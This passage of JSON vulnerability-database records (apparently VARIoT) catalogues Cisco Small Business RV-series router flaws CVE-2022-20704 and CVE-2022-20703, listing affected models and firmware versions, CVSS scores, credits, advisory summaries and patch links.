            id: "CVE-2022-20704",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004937",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202202-165",
         },
         {
            db: "NVD",
            id: "CVE-2022-20704",
         },
         {
            db: "NVD",
            id: "CVE-2022-20704",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco Small Business RV Series routers contain an out-of-bounds write vulnerability.Information may be obtained and information may be tampered with. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Cisco RV340 routers. User interaction is required to exploit this vulnerability in that an administrator must perform a firmware update on the device.The specific flaw exists within the downloading of firmware files via HTTPS. The issue results from the lack of proper validation of the certificate presented by the server. An attacker can leverage this vulnerability to execute code in the context of root",
      sources: [
         {
            db: "NVD",
            id: "CVE-2022-20704",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004937",
         },
         {
            db: "ZDI",
            id: "ZDI-22-413",
         },
         {
            db: "VULMON",
            id: "CVE-2022-20704",
         },
      ],
      trust: 2.34,
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2022-20704",
            trust: 4,
         },
         {
            db: "ZDI",
            id: "ZDI-22-413",
            trust: 2.4,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004937",
            trust: 0.8,
         },
         {
            db: "ZDI_CAN",
            id: "ZDI-CAN-15810",
            trust: 0.7,
         },
         {
            db: "CS-HELP",
            id: "SB2022020301",
            trust: 0.6,
         },
         {
            db: "CNNVD",
            id: "CNNVD-202202-165",
            trust: 0.6,
         },
         {
            db: "VULMON",
            id: "CVE-2022-20704",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "ZDI",
            id: "ZDI-22-413",
         },
         {
            db: "VULMON",
            id: "CVE-2022-20704",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004937",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202202-165",
         },
         {
            db: "NVD",
            id: "CVE-2022-20704",
         },
      ],
   },
   id: "VAR-202202-0329",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "VARIoT devices database",
            id: null,
         },
      ],
      trust: 0.18174963,
   },
   last_update_date: "2024-02-13T22:30:10.574000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "cisco-sa-smb-mult-vuln-KA9PK6D",
            trust: 0.8,
            url: "https://sec.cloudapps.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-smb-mult-vuln-ka9pk6d",
         },
         {
            title: "Cisco has issued an update to correct this vulnerability.",
            trust: 0.7,
            url: "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-smb-mult-vuln-ka9pk6d",
         },
         {
            title: "Cisco Small Business Buffer error vulnerability fix",
            trust: 0.6,
            url: "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=183258",
         },
         {
            title: "Cisco: Cisco Small Business RV Series Routers Vulnerabilities",
            trust: 0.1,
            url: "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts&qid=cisco-sa-smb-mult-vuln-ka9pk6d",
         },
         {
            title: "CVE-2022-XXXX",
            trust: 0.1,
            url: "https://github.com/alphabugx/cve-2022-23305 ",
         },
         {
            title: "CVE-2022-XXXX",
            trust: 0.1,
            url: "https://github.com/alphabugx/cve-2022-rce ",
         },
      ],
      sources: [
         {
            db: "ZDI",
            id: "ZDI-22-413",
         },
         {
            db: "VULMON",
            id: "CVE-2022-20704",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004937",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202202-165",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-787",
            trust: 1,
         },
         {
            problemtype: "Out-of-bounds writing (CWE-787) [NVD evaluation ]",
            trust: 0.8,
         },
      ],
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2022-004937",
         },
         {
            db: "NVD",
            id: "CVE-2022-20704",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 2.4,
            url: "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-smb-mult-vuln-ka9pk6d",
         },
         {
            trust: 1.8,
            url: "https://www.zerodayinitiative.com/advisories/zdi-22-413/",
         },
         {
            trust: 1.4,
            url: "https://nvd.nist.gov/vuln/detail/cve-2022-20704",
         },
         {
            trust: 0.6,
            url: "https://www.cybersecurity-help.cz/vdb/sb2022020301",
         },
         {
            trust: 0.1,
            url: "https://cwe.mitre.org/data/definitions/787.html",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov",
         },
         {
            trust: 0.1,
            url: "https://github.com/alphabugx/cve-2022-23305",
         },
      ],
      sources: [
         {
            db: "ZDI",
            id: "ZDI-22-413",
         },
         {
            db: "VULMON",
            id: "CVE-2022-20704",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004937",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202202-165",
         },
         {
            db: "NVD",
            id: "CVE-2022-20704",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "ZDI",
            id: "ZDI-22-413",
         },
         {
            db: "VULMON",
            id: "CVE-2022-20704",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004937",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202202-165",
         },
         {
            db: "NVD",
            id: "CVE-2022-20704",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2022-02-22T00:00:00",
            db: "ZDI",
            id: "ZDI-22-413",
         },
         {
            date: "2022-02-10T00:00:00",
            db: "VULMON",
            id: "CVE-2022-20704",
         },
         {
            date: "2023-05-11T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2022-004937",
         },
         {
            date: "2022-02-03T00:00:00",
            db: "CNNVD",
            id: "CNNVD-202202-165",
         },
         {
            date: "2022-02-10T18:15:09.253000",
            db: "NVD",
            id: "CVE-2022-20704",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2022-02-22T00:00:00",
            db: "ZDI",
            id: "ZDI-22-413",
         },
         {
            date: "2023-11-07T00:00:00",
            db: "VULMON",
            id: "CVE-2022-20704",
         },
         {
            date: "2023-05-11T09:08:00",
            db: "JVNDB",
            id: "JVNDB-2022-004937",
         },
         {
            date: "2022-02-25T00:00:00",
            db: "CNNVD",
            id: "CNNVD-202202-165",
         },
         {
            date: "2023-11-07T03:42:40.520000",
            db: "NVD",
            id: "CVE-2022-20704",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-202202-165",
         },
      ],
      trust: 0.6,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "plural  Cisco Small Business RV  Series router out-of-bounds write vulnerability",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2022-004937",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "buffer error",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-202202-165",
         },
      ],
      trust: 0.6,
   },
}

var-202202-0323
Vulnerability from variot

Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco Small Business RV Series routers contain an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Cisco RV340 routers. Authentication is not required to exploit this vulnerability.The specific flaw exists within the handling of firmware updates. The issue results from the lack of proper validation of a firmware image when performing an upgrade. An attacker can leverage this vulnerability to execute code in the context of root

Show details on source website


{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-202202-0323",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "rv340",
            scope: null,
            trust: 1.4,
            vendor: "cisco",
            version: null,
         },
         {
            model: "rv340w",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.03.24",
         },
         {
            model: "rv340",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.03.24",
         },
         {
            model: "rv345p",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.03.24",
         },
         {
            model: "rv260p",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.05",
         },
         {
            model: "rv160",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.05",
         },
         {
            model: "rv345",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.03.24",
         },
         {
            model: "rv260",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.05",
         },
         {
            model: "rv160w",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.05",
         },
         {
            model: "rv260w",
            scope: "lte",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.05",
         },
         {
            model: "rv160w wireless-ac vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv340w dual wan gigabit wireless-ac vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv260w wireless-ac vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv260 vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv345p dual wan gigabit poe vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv345 dual wan gigabit vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv160 vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv260p vpn router with poe",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv340 dual wan gigabit vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
      ],
      sources: [
         {
            db: "ZDI",
            id: "ZDI-22-413",
         },
         {
            db: "ZDI",
            id: "ZDI-22-408",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004543",
         },
         {
            db: "NVD",
            id: "CVE-2022-20703",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.03.24",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv340:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv340w_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.03.24",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv340w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv345_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.03.24",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv345:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv345p_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.03.24",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv345p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv160_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.01.05",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv160:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv160w_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.01.05",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv160w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.01.05",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv260:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260p_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.01.05",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv260p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260w_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "1.0.01.05",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv260w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2022-20703",
         },
      ],
   },
   credits: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/credits#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Bien Pham (@bienpnn) from Team Orca of Sea Security (security.sea.com)",
      sources: [
         {
            db: "ZDI",
            id: "ZDI-22-408",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202202-164",
         },
      ],
      trust: 1.3,
   },
   cve: "CVE-2022-20703",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "LOW",
                  accessVector: "LOCAL",
                  authentication: "NONE",
                  author: "NVD",
                  availabilityImpact: "COMPLETE",
                  baseScore: 7.2,
                  confidentialityImpact: "COMPLETE",
                  exploitabilityScore: 3.9,
                  impactScore: 10,
                  integrityImpact: "COMPLETE",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "HIGH",
                  trust: 1,
                  userInteractionRequired: false,
                  vectorString: "AV:L/AC:L/Au:N/C:C/I:C/A:C",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Low",
                  accessVector: "Local",
                  authentication: "None",
                  author: "NVD",
                  availabilityImpact: "Complete",
                  baseScore: 7.2,
                  confidentialityImpact: "Complete",
                  exploitabilityScore: null,
                  id: "CVE-2022-20703",
                  impactScore: null,
                  integrityImpact: "Complete",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "High",
                  trust: 0.9,
                  userInteractionRequired: null,
                  vectorString: "AV:L/AC:L/Au:N/C:C/I:C/A:C",
                  version: "2.0",
               },
            ],
            cvssV3: [
               {
                  attackComplexity: "LOW",
                  attackVector: "LOCAL",
                  author: "NVD",
                  availabilityImpact: "HIGH",
                  baseScore: 8.4,
                  baseSeverity: "HIGH",
                  confidentialityImpact: "HIGH",
                  exploitabilityScore: 2.5,
                  impactScore: 5.9,
                  integrityImpact: "HIGH",
                  privilegesRequired: "NONE",
                  scope: "UNCHANGED",
                  trust: 1,
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                  version: "3.1",
               },
               {
                  attackComplexity: "LOW",
                  attackVector: "NETWORK",
                  author: "ykramarz@cisco.com",
                  availabilityImpact: "HIGH",
                  baseScore: 10,
                  baseSeverity: "CRITICAL",
                  confidentialityImpact: "HIGH",
                  exploitabilityScore: 3.9,
                  impactScore: 6,
                  integrityImpact: "HIGH",
                  privilegesRequired: "NONE",
                  scope: "CHANGED",
                  trust: 1,
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                  version: "3.1",
               },
               {
                  attackComplexity: "Low",
                  attackVector: "Local",
                  author: "NVD",
                  availabilityImpact: "High",
                  baseScore: 8.4,
                  baseSeverity: "High",
                  confidentialityImpact: "High",
                  exploitabilityScore: null,
                  id: "CVE-2022-20703",
                  impactScore: null,
                  integrityImpact: "High",
                  privilegesRequired: "None",
                  scope: "Unchanged",
                  trust: 0.8,
                  userInteraction: "None",
                  vectorString: "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                  version: "3.0",
               },
               {
                  attackComplexity: "HIGH",
                  attackVector: "ADJACENT",
                  author: "ZDI",
                  availabilityImpact: "HIGH",
                  baseScore: 7.1,
                  baseSeverity: "HIGH",
                  confidentialityImpact: "HIGH",
                  exploitabilityScore: 1.2,
                  id: "CVE-2022-20703",
                  impactScore: 5.9,
                  integrityImpact: "HIGH",
                  privilegesRequired: "NONE",
                  scope: "UNCHANGED",
                  trust: 0.7,
                  userInteraction: "REQUIRED",
                  vectorString: "AV:A/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
                  version: "3.0",
               },
               {
                  attackComplexity: "LOW",
                  attackVector: "ADJACENT",
                  author: "ZDI",
                  availabilityImpact: "HIGH",
                  baseScore: 8.8,
                  baseSeverity: "HIGH",
                  confidentialityImpact: "HIGH",
                  exploitabilityScore: 2.8,
                  id: "CVE-2022-20703",
                  impactScore: 5.9,
                  integrityImpact: "HIGH",
                  privilegesRequired: "NONE",
                  scope: "UNCHANGED",
                  trust: 0.7,
                  userInteraction: "NONE",
                  vectorString: "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                  version: "3.0",
               },
            ],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2022-20703",
                  trust: 1.8,
                  value: "HIGH",
               },
               {
                  author: "ZDI",
                  id: "CVE-2022-20703",
                  trust: 1.4,
                  value: "HIGH",
               },
               {
                  author: "ykramarz@cisco.com",
                  id: "CVE-2022-20703",
                  trust: 1,
                  value: "CRITICAL",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-202202-164",
                  trust: 0.6,
                  value: "HIGH",
               },
               {
                  author: "VULMON",
                  id: "CVE-2022-20703",
                  trust: 0.1,
                  value: "HIGH",
               },
            ],
         },
      ],
      sources: [
         {
            db: "ZDI",
            id: "ZDI-22-413",
         },
         {
            db: "ZDI",
            id: "ZDI-22-408",
         },
         {
            db: "VULMON",
            id: "CVE-2022-20703",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004543",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202202-164",
         },
         {
            db: "NVD",
            id: "CVE-2022-20703",
         },
         {
            db: "NVD",
            id: "CVE-2022-20703",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco Small Business RV Series routers contain an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Cisco RV340 routers. Authentication is not required to exploit this vulnerability.The specific flaw exists within the handling of firmware updates. The issue results from the lack of proper validation of a firmware image when performing an upgrade. An attacker can leverage this vulnerability to execute code in the context of root",
      sources: [
         {
            db: "NVD",
            id: "CVE-2022-20703",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004543",
         },
         {
            db: "ZDI",
            id: "ZDI-22-413",
         },
         {
            db: "ZDI",
            id: "ZDI-22-408",
         },
         {
            db: "VULMON",
            id: "CVE-2022-20703",
         },
      ],
      trust: 2.97,
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2022-20703",
            trust: 4.7,
         },
         {
            db: "ZDI",
            id: "ZDI-22-413",
            trust: 2.4,
         },
         {
            db: "ZDI",
            id: "ZDI-22-408",
            trust: 2.4,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004543",
            trust: 0.8,
         },
         {
            db: "ZDI_CAN",
            id: "ZDI-CAN-15810",
            trust: 0.7,
         },
         {
            db: "ZDI_CAN",
            id: "ZDI-CAN-15611",
            trust: 0.7,
         },
         {
            db: "CS-HELP",
            id: "SB2022020301",
            trust: 0.6,
         },
         {
            db: "CNNVD",
            id: "CNNVD-202202-164",
            trust: 0.6,
         },
         {
            db: "VULMON",
            id: "CVE-2022-20703",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "ZDI",
            id: "ZDI-22-413",
         },
         {
            db: "ZDI",
            id: "ZDI-22-408",
         },
         {
            db: "VULMON",
            id: "CVE-2022-20703",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-004543",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202202-164",
         },
         {
            db: "NVD",
            id: "CVE-2022-20703",
         },
      ],
   },
   id: "VAR-202202-0323",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "VARIoT devices database",
            id: null,
         },
      ],
      trust: 0.18174963,
   },
   last_update_date: "2024-01-18T22:29:34.474000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
